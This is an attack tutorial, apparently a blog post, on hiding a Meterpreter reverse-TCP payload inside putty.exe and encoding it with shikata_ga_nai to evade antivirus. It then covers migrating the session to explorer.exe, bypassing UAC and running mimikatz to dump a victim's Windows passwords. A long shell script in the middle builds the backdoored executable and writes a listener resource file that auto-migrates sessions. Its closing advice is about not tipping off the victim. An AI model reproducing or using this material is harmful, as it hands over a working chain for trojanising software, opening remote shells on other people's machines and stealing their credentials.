First of all we will create a payload (which we will later send to the victim for execution). But do you think somebody is going to click on a plain file which does nothing when executed, and not get suspicious? The answer is simple: no.
So here we will bind the payload to a legitimate executable, which reduces the suspicion factor drastically. In this tutorial I'm using a very simple program named putty.exe which just pops up "You just got Pwned!" (I know this clearly tips off the victim, but it is only for the sake of the tutorial; you can use any .exe of your choice).
The troubles don't end here: any AV (Anti Virus) is going to catch a stock msf payload. This is where encoding (often loosely called "crypting") comes into play. In this tutorial I'm using the x86/shikata_ga_nai encoder which, although ranked "excellent" in msfencode, does not make the file FUD (Fully UnDetectable); it only reduces the chance of getting caught, depending on which AV the victim machine runs. Keep in mind that msf encoders were built to avoid bad characters in shellcode, not to evade AV, and the shikata_ga_nai decoder stub is itself a well-known signature. There are methods of making files FUD, but they would take us away from our current aim.
Stuff you'll need
- Kali Linux / Backtrack
- Windows machine(target)
- A little bit of Linux and msf knowledge (although I have tried to explain every single thing)
- Mimikatz
First we change our directory to the desktop and extract mimikatz (the tool that dumps Windows passwords in clear text) into a directory on the desktop.
Then we make a folder called "hax", copy "putty.exe" from the desktop into the newly created directory, recheck with the "ls" command, and change directory into "hax". Then we fire the next command:
This is because we are using "putty.exe" as the template in the next command, so it needs to be in place.
Where "LHOST" is the IP address and "LPORT" is the port (I'm using 4443, you can use any) of the attacking machine.
Here we are creating the backdoor. "R" asks for raw output, which lets us pipe the shellcode into the encoder (the | is the pipe). Then "-t" specifies the type of output (exe in this case), "-x" the template (putty.exe in this case), "-k" keeps the original functionality of the program the backdoor is inserted into (the payload runs in a separate thread), "-o" the output name, "-e" the encoder to use, and finally "-c" the number of times the payload is encoded. Note that the template must have the same architecture as the payload: windows/meterpreter/reverse_tcp is 32-bit shellcode, so a 64-bit putty.exe will not work as a template.
Then we make it executable using the chmod command (this only changes the Linux file mode and has no effect on how Windows runs the file, so the step is optional).
Meanwhile let us prepare to receive the shell.
Then we verify that our settings are fine:
Next we use
And upon execution of our backdoored "putty.exe", putty opens up just fine on the victim's side.
But on our side the scene has changed a bit.
But now a process "bdoor_putty.exe" is running on the victim's PC, which means we will lose our session as soon as the victim closes our backdoored program. Therefore we migrate to a more stable process (explorer.exe in this case), and we should do it straight away, before the victim has a chance to close putty.
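The build, listener and migration steps above, pulled together as an added example (the commands themselves did not survive on this page, and this is not the tutorial's own script). It assumes the old msfpayload/msfencode tools from Kali/Backtrack of that era and the switches the text describes; the encode count (-c 5), the output names and the use of post/windows/manage/migrate with its NAME option to reach explorer.exe are assumptions. It adds one check the text does not mention: -x only works when the template's architecture matches the payload, so the script reads the PE Machine field before building. The stub PE writer produces constructed sample input for that check only and is not a runnable executable.

```shell
#!/bin/sh
# Added example, not the tutorial's own commands. Assumes the old
# msfpayload/msfencode tools (Kali/Backtrack era) and the switches the text
# describes; the encode count (-c 5) and the AutoRunScript option are assumptions.
set -eu

zeros() { dd if=/dev/zero bs=1 count="$1" 2>/dev/null; }   # emit N NUL bytes

# Read NBYTES at OFFSET from FILE as a little-endian unsigned integer.
le_uint() {  # le_uint FILE OFFSET NBYTES
    local f=$1 off=$2 n=$3 val=0 bits=0 b
    for b in $(od -An -v -tu1 -j "$off" -N "$n" "$f" 2>/dev/null || true); do
        val=$(( val | (b << bits) ))
        bits=$(( bits + 8 ))
    done
    printf '%d' "$val"
}

# Print the IMAGE_FILE_HEADER.Machine value of a PE file, or 0 when the file
# is not a PE at all (no MZ stub, e_lfanew out of range, or no "PE\0\0").
pe_machine() {  # pe_machine FILE
    local f=$1 size pe_off
    [ -s "$f" ] || { printf '%d' 0; return 0; }
    [ "$(le_uint "$f" 0 2)" -eq 23117 ] || { printf '%d' 0; return 0; }      # 0x5A4D = "MZ"
    size=$(wc -c < "$f" | tr -d ' ')
    pe_off=$(le_uint "$f" 60 4)                                                # e_lfanew at 0x3C
    [ "$pe_off" -gt 0 ] && [ $(( pe_off + 6 )) -le "$size" ] || { printf '%d' 0; return 0; }
    [ "$(le_uint "$f" "$pe_off" 4)" -eq 17744 ] || { printf '%d' 0; return 0; } # "PE\0\0"
    le_uint "$f" $(( pe_off + 4 )) 2                                           # Machine field
}

# 0x014C is IMAGE_FILE_MACHINE_I386; windows/meterpreter/reverse_tcp is 32-bit
# shellcode, so msfencode -x needs a 32-bit template.
pe_is_x86() {  # pe_is_x86 FILE
    [ "$(pe_machine "$1")" -eq 332 ]
}

# Constructed sample input for the check above: a 72-byte stub with just enough
# header to parse (MZ, e_lfanew=0x40, "PE\0\0", Machine). Not an executable.
write_stub_pe() {  # write_stub_pe FILE MACHINE   (MACHINE decimal, e.g. 332 or 34404)
    local f=$1 m=$2 lo hi
    lo=$(( m & 255 )); hi=$(( (m >> 8) & 255 ))
    {
        printf 'MZ';   zeros 58                           # DOS stub, padded to 0x3C
        printf '\100'; zeros 3                            # e_lfanew = 0x40
        printf 'PE';   zeros 2                            # IMAGE_NT_SIGNATURE
        printf "$(printf '\\%03o\\%03o' "$lo" "$hi")"     # Machine, little-endian
        zeros 2                                           # NumberOfSections
    } > "$f"
}

# The pipeline the text describes: raw (R) shellcode piped into msfencode, which
# injects it into the template (-x), keeps the template working (-k) and runs
# the encoder -c times. Refuses templates whose architecture cannot host x86 code.
build_backdoor() {  # build_backdoor TEMPLATE LHOST LPORT OUTPUT
    local template=$1 lhost=$2 lport=$3 out=$4
    pe_is_x86 "$template" || {
        echo "refusing: $template is not a 32-bit (i386) PE, so -x cannot host an x86 payload" >&2
        return 1
    }
    msfpayload windows/meterpreter/reverse_tcp LHOST="$lhost" LPORT="$lport" R \
        | msfencode -t exe -x "$template" -k -o "$out" -e x86/shikata_ga_nai -c 5
}

# Listener resource file. ExitOnSession false keeps the handler alive for repeat
# callbacks; AutoRunScript migrates out of the backdoored putty process the
# moment a session opens, before the victim can close it.
write_handler_rc() {  # write_handler_rc LHOST LPORT OUTFILE
    cat > "$3" <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set ExitOnSession false
set AutoRunScript post/windows/manage/migrate NAME=explorer.exe
exploit -j
EOF
}

# Usage: backdoor.sh build TEMPLATE LHOST LPORT OUTPUT
#        backdoor.sh handler LHOST LPORT OUTFILE     (then: msfconsole -r OUTFILE)
case "${1:-}" in
    build)   build_backdoor "$2" "$3" "$4" "$5" ;;
    handler) write_handler_rc "$2" "$3" "$4" ;;
esac
```

Run `sh backdoor.sh build putty.exe 192.168.1.10 4443 bdoor_putty.exe` on the attacking machine, then `sh backdoor.sh handler 192.168.1.10 4443 handler.rc` followed by `msfconsole -r handler.rc`. The architecture check is the part worth keeping even if you switch to msfvenom: a mismatched template fails in confusing ways, or produces a file that crashes on the victim and tips them off.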
Then we create a folder called "mimi" into which we upload the whole contents of mimikatz/Win32 (the target machine is 32-bit; a 64-bit target needs the x64 build).
Now lets fire up mimikatz.
Here the "-H" switch of execute creates the process hidden from view and "-i" interacts with the process after it is created.
Then we type the following command in mimikatz
Although the tool's output is in French, we can see that it does not have "all privileges", which means we need SYSTEM-level privileges (SYSTEM, not Administrator).
So now, to attain SYSTEM-level privileges, we use post/windows/escalate/bypassuac. Strictly speaking, bypassing UAC gives an elevated Administrator session; if mimikatz still complains about privileges in the new session, run getsystem in it first.
Now we go into the same directory where we had uploaded mimikatz and run the executable.
Now, to get the password of the logged-in user, we use the following command.
A very long list might pop up, but you can easily pick out the information of interest.
With this I end the tutorial; I hope it proved helpful for you. Please use the comment section wisely.